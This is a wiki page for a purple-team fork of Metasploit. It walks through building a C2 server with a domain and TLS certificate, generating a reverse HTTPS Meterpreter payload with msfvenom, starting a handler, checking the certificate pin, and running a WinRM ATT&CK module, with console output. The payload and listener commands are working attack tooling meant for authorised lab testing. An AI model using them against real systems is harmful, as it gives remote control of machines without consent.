
Operational Setup and Usage

dweezy-netsec edited this page Apr 17, 2019 · 3 revisions

Setup and Usage

C2 Server

Spin up a cloud virtual machine. Praetorian is a fan of GCP, but any other provider will also work. Whichever you pick, open inbound TCP 443 (the listener) and TCP 80 (the certificate challenge below) to the VM in the provider's firewall.

https://cloud.google.com/compute/docs/quickstart-linux#create_a_virtual_machine_instance

DNS

Pick a domain name, register it, and create a DNS A record pointing it at the VM's public IP. CloudFlare is easy and has low prices for domain registration.

https://www.cloudflare.com/dns/

SSL

We recommend using a valid SSL certificate for operational testing. Let's Encrypt is free and fast. The standalone mode used below answers the HTTP-01 challenge itself, so run it before anything else is listening on port 80 and make sure port 80 is reachable from the internet. certbot-auto has since been retired; on a current distribution install certbot from your package manager and run the same certonly command.

export DNS_NAME="mytestdomain.com"
wget https://dl.eff.org/certbot-auto
chmod a+x ./certbot-auto
./certbot-auto -q
./certbot-auto certonly -d $DNS_NAME --standalone --register-unsafely-without-email -n --agree-tos

Installation

Follow the directions here

SSL Certificate

Assuming you cloned the repository to your home directory (replace the domain with your domain name). /etc/letsencrypt/live is readable only by root, so run this with sudo. HandlerSSLCert expects the private key and the certificate chain together in a single PEM file, which is what the concatenation produces.

cd /etc/letsencrypt/live/mytestdomain.com
cat privkey.pem fullchain.pem > ~/purple-team-attack-automation/MSF.pem

Payload

cd ~
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall
msfvenom -p windows/x64/meterpreter_reverse_https lhost=mytestdomain.com lport=443 -a x64 -f exe HandlerSSLCert=~/purple-team-attack-automation/MSF.pem StagerVerifySSLCert=true -o ~/attack-testing.exe

Transfer the payload to your test Windows box (make sure to add an exception for it in whatever AV/EDR you're using). Because the payload was built with StagerVerifySSLCert=true, it carries a hash of the certificate in MSF.pem and will only talk to a handler presenting that exact certificate. Let's Encrypt certificates are valid for 90 days, so after a renewal rebuild MSF.pem and regenerate the payload.

Listener

You can use the example resource script below to start your listener. The HandlerSSLCert path in it is relative, so either start msfconsole from ~/purple-team-attack-automation or put the absolute path in the script. Binding port 443 requires root. A bare filename given to resource is looked up in the framework's scripts/resource directory (the transcript below shows it resolved under /usr/src/metasploit-framework); pass the full path if you saved the script somewhere else.

$ echo '<ruby>
print_status("Starting HTTPS listener for Windows x64 meterpreter on port 443.")
run_single("use exploit/multi/handler")
run_single("set payload windows/x64/meterpreter_reverse_https")
run_single("set lport 443")
run_single("set HandlerSSLCert MSF.pem")
run_single("set ExitOnSession false")
run_single("set StagerVerifySSLCert true")
run_single("exploit -j")
</ruby>' > ~/purple-team-attack-automation/scripts/resource/windows_listener.rc

After your listener is up and running, execute the payload on the Windows box as an administrator and you should receive a callback.
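The SSL, Payload and Listener steps above all depend on the same certificate: the payload only connects to a handler presenting the certificate whose hash msfvenom embedded. The following is an added example, not code from purple-team-attack-automation or from Metasploit, for checking that pin before an engagement. It assumes MSF.pem was built as shown (private key followed by fullchain) and recomputes the pin the way the framework does, as the SHA-1 of the DER encoding of the first certificate in the file (the leaf); the function names and the sample PEM blobs are this example's own, and the blobs are constructed base64 rather than real keys or certificates.

```python
"""Certificate-pin check for a payload built with StagerVerifySSLCert=true.

Added example for this page, not code from purple-team-attack-automation or
Metasploit. The pin is the SHA-1 of the DER-encoded leaf certificate in
HandlerSSLCert; MSF.pem is privkey + fullchain, so the leaf is the first
CERTIFICATE block. Function names and sample data below are this example's own.
"""
import base64
import hashlib
import re
import ssl
import sys

# First BEGIN/END CERTIFICATE pair in the bundle; the PRIVATE KEY block does not match.
CERT_BLOCK = re.compile(
    r"-----BEGIN CERTIFICATE-----\r?\n.*?-----END CERTIFICATE-----", re.DOTALL
)


def leaf_certificate_pem(bundle_pem: str) -> str:
    """Return the first CERTIFICATE block of a key+chain bundle (the leaf)."""
    match = CERT_BLOCK.search(bundle_pem)
    if match is None:
        raise ValueError("no CERTIFICATE block in bundle")
    return match.group(0)


def leaf_certificate_der(bundle_pem: str) -> bytes:
    """DER bytes of the leaf; ssl.PEM_cert_to_DER_cert strips the armor and base64-decodes."""
    return ssl.PEM_cert_to_DER_cert(leaf_certificate_pem(bundle_pem))


def cert_sha1_fingerprint(cert_pem: str) -> str:
    """Hex SHA-1 over the DER encoding: the value the stager compares against."""
    return hashlib.sha1(ssl.PEM_cert_to_DER_cert(cert_pem)).hexdigest()


def pinned_fingerprint(bundle_pem: str) -> str:
    """The pin msfvenom embeds for this HandlerSSLCert bundle."""
    return cert_sha1_fingerprint(leaf_certificate_pem(bundle_pem))


def pin_matches_cert(bundle_pem: str, served_leaf_pem: str) -> bool:
    """True if the certificate a handler serves is the one pinned in the payload."""
    return pinned_fingerprint(bundle_pem) == cert_sha1_fingerprint(served_leaf_pem)


def pin_matches_server(bundle_pem: str, host: str, port: int = 443) -> bool:
    """Fetch the handler's live leaf certificate and compare it with the pin.

    A Let's Encrypt renewal produces a new leaf with a different DER encoding,
    so this turns False and the payload has to be regenerated.
    """
    return pin_matches_cert(bundle_pem, ssl.get_server_certificate((host, port)))


# --- constructed sample data (not real keys or certificates) ------------------
def _pem(label: str, body: bytes) -> str:
    b64 = base64.encodebytes(body).decode("ascii")  # ends with a newline
    return f"-----BEGIN {label}-----\n{b64}-----END {label}-----\n"


LEAF_DER = b"constructed leaf certificate bytes, not real DER"
RENEWED_LEAF_DER = b"constructed leaf after renewal, different bytes"
SAMPLE_LEAF_PEM = _pem("CERTIFICATE", LEAF_DER)
SAMPLE_INTERMEDIATE_PEM = _pem("CERTIFICATE", b"constructed intermediate bytes")
RENEWED_LEAF_PEM = _pem("CERTIFICATE", RENEWED_LEAF_DER)
SAMPLE_KEY_PEM = _pem("PRIVATE KEY", b"constructed private key bytes")
# Same layout as `cat privkey.pem fullchain.pem > MSF.pem` on this page.
SAMPLE_BUNDLE = SAMPLE_KEY_PEM + SAMPLE_LEAF_PEM + SAMPLE_INTERMEDIATE_PEM
RENEWED_BUNDLE = SAMPLE_KEY_PEM + RENEWED_LEAF_PEM + SAMPLE_INTERMEDIATE_PEM

if __name__ == "__main__":
    # Usage: python pincheck.py /path/to/MSF.pem mytestdomain.com [443]
    if len(sys.argv) >= 3:
        with open(sys.argv[1]) as fh:
            bundle = fh.read()
        port = int(sys.argv[3]) if len(sys.argv) > 3 else 443
        print("pinned  :", pinned_fingerprint(bundle))
        print("matches :", pin_matches_server(bundle, sys.argv[2], port))
    else:
        print("pin from constructed bundle:", pinned_fingerprint(SAMPLE_BUNDLE))
```

Run it as python pincheck.py ~/purple-team-attack-automation/MSF.pem mytestdomain.com once the listener is up; a False result means the certificate the handler presents is no longer the one the payload was generated against, and msfvenom has to be rerun with the current MSF.pem. Without arguments it only prints the pin of the constructed bundle.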

Using a Module

With a session open, select a purple-team module by its ATT&CK technique ID, review its options with info, and run it with exploit. In the transcript below the first half of the module's CMD (winrm qc -q) fails because the test box's network profile is Public; fix that on the box with Set-NetConnectionProfile -NetworkCategory Private in PowerShell. The & separator runs the second half regardless: the Win32_Process call returns 0 and launches calc, so the module still reports success and its CLEANUP step kills the calculator.

msf5 auxiliary(scanner/smb/impacket/secretsdump) > resource windows_listener.rc 
[*] Processing /usr/src/metasploit-framework/scripts/resource/windows_listener.rc for ERB directives.
[*] resource (/usr/src/metasploit-framework/scripts/resource/windows_listener.rc)> Ruby Code (270 bytes)
[*] Starting HTTPS listener for Windows x64 meterpreter on port 443.
payload => windows/x64/meterpreter_reverse_https
lport => 443
lhost => 0.0.0.0
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) > 
[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] https://0.0.0.0:443 handling request from 192.168.137.11; (UUID: czgdxj3z) Redirecting stageless connection from /2F-7ig9OfztlUGRSOeTJogLC1HD_4Yf2RGj-ZlWaPE6oCIdO_nvk_GC913H-gXl7lhXUXYcn with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://0.0.0.0:443 handling request from 192.168.137.11; (UUID: czgdxj3z) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (172.18.0.3:443 -> 192.168.137.11:52012) at 2019-04-15 16:10:27 +0000

msf5 post(windows/purple/t1005) > use post/windows/purple/t1028
msf5 post(windows/purple/t1028) > info

       Name: Windows Remote Management (T1028) Windows - Purple Team
     Module: post/windows/purple/t1028
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Praetorian

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting                                                       Required  Description
  ----     ---------------                                                       --------  -----------
  CLEANUP  true                                                                  yes       Close any instances of calc
  CMD      winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}  yes       Command to execute
  SESSION  1                                                                     yes       The session to run this module on.

Description:
  Execution, Lateral Movement: Windows Remote Management (WinRM) is 
  the name of both a Windows service and a protocol that allows a user 
  to interact with a remote system (e.g., run an executable, modify 
  the Registry, modify services). It may be called with the winrm 
  command or by any number of programs such as PowerShell.

References:
  CVE: Not available
  https://attack.mitre.org/wiki/Technique/T1028

msf5 post(windows/purple/t1028) > exploit

[+] Found an instance of Calculator running. Killing it.
[*] Executing 'cmd /c winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}' on #<Session:meterpreter 192.168.137.11:52012 (10.0.2.15) "PURPLEDEV\Administrator @ DESKTOP-1">
[!] WinRM service is already running on this machine.
WSManFault
    Message
        ProviderFault
            WSManFault
                Message = WinRM firewall exception will not work since one of the network connection types on this machine is set to Public. Change the network connection type to either Domain or Private and try again. 

Error number:  -2144108183 0x80338169
WinRM firewall exception will not work since one of the network connection types on this machine is set to Public. Change the network connection type to either Domain or Private and try again. 
create_OUTPUT
    ProcessId = 5456
    ReturnValue = 0

[+] Module T1028W execution successful.
[+] Found an instance of Calculator running. Killing it.
[+] Found an instance of Calculator running. Killing it.
[*] Post module execution completed
msf5 post(windows/purple/t1028) > 